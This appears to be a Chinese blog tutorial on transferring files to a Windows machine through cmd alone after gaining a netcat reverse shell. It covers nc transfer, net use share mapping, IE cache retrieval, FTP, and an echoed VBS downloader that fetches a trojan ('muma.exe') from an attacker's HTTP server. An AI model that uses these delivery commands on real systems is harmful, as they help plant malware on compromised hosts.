僅通過CMD傳送文件

可能某些時候你喜歡只通過cmd來下載文件，抑或某些特定情況只有cmd界面可以使用(nc反彈shell)，在一臺沒安裝curl等第三方下載器的windows的cmd似乎不是很方便傳送文件，這里記錄5種方法（nc，文件共享，寫入vbs結(jié)合http服務(wù)下載，通過ie緩存下載,ftp服務(wù)下載）

1.nc

適用于通過nc反彈得到界面的情況

nc -v -l -p 4141 >mubiao.exe

::目的端打開一個4141端口接受傳來的數(shù)據(jù)并寫入mubiao.exe

nc -v 目標地址 4141 < C://wenjian.exe

::傳送端

結(jié)果：速度慢效率低，還可能失敗

2.文件共享(局域網(wǎng)環(huán)境或者VPN)

傳送端新建用戶及密碼(為啥新建懂得都懂),創(chuàng)建共享文件夾，設(shè)置路徑權(quán)限什么的和普通一樣，關(guān)鍵是如何cmd來完成文件共享的接收，命令如下

net use M: 共享路徑 密碼 /use:用戶名

::該命令把共享文件夾映射到M:位置，注：共享路徑以//開頭，返回結(jié)果為命令成功完成就ok了

M:/

::進入M驅(qū)動器，dir可以看到想傳送的文件，之后就copy就可以了

3. 寫入vbs結(jié)合http服務(wù)下載

vbs簡直就是windows的另一shell(原諒我的用詞不準確),cmd難以echo>的方法寫入exe文件，但是vbs卻是可以輕松寫入并執(zhí)行，學(xué)好vbs對于網(wǎng)絡(luò)攻防搞windows確實很重要。

話不多說，具體操作，先把要發(fā)送的文件放到http服務(wù)器上，自己一鍵化搭建推薦phpstudy，確保能通過ie訪問，可以用start加文件網(wǎng)絡(luò)地址測試，搭建完畢后就是目標端vbs的寫入及執(zhí)行了，這里提供一個例子

echo Set post=CreateObject("Msxml2.XMLHTTP")>>1.vbs

echo post.Open "GET","http://192.168.44.1/muma.exe(網(wǎng)絡(luò)路徑)">>1.vbs

echo post.Send()>>1.vbs

echo Set aGet = CreateObject("ADODB.Stream")>>1.vbs

echo aGet.Mode = 3 >>1.vbs

echo aGet.Type = 1 >>1.vbs

echo aGet.Open()>>1.vbs

echo aGet.Write(post.responseBody)>>1.vbs

echo aGet.SaveToFile "muma.exe(保存的名字)",2 >>1.vbs

1.vbs

::幾個需要注意的地方，數(shù)字>>之間要加空格，網(wǎng)絡(luò)路徑和最后保存的文件名不必一致

::寫完可以使用type 1.vbs檢查

::最后刪除可以用del 1.vbs

4. 通過ie緩存下載

緩存是一個非常有意思的東西，對于音樂軟件，以前緩存音樂被拷貝出來實在常見，不過現(xiàn)在不付費緩存都緩存不了，還是挺好的

言歸正傳，ie作為電腦自帶的雞肋瀏覽器，在本任務(wù)中還是能起不少作用。要讓ie把文件緩存下來只需要一個合適的后綴名，例如jpg,在http服務(wù)器將你要傳送的文件命名為xx.jpg

目標端訪問文件

start 文件網(wǎng)絡(luò)路徑

::適用于默認瀏覽器是ie,如果不是則用 ie瀏覽器絕對路徑 文件網(wǎng)絡(luò)路徑

::執(zhí)行之后即已經(jīng)被ie緩存

taskkill /f /t /im iexplore.exe

::關(guān)閉ie進程避免被占用

cd C:\Documents and Settings\AlunX\Local Settings\Temporary Internet Files

::ie緩存文件夾位置

cd Content.IE5

dir /a

::/a是顯示所有文件夾，會看到隨機名稱的文件夾，找到緩存文件所在位置cd進入

dir /a

::查看緩存文件名，例如xx[1].jpg

copy xx[1].jpg 目的位置

5. ftp服務(wù)下載

傳送端搭建ftp服務(wù)器，目標端訪問下載，ftp命令無需多講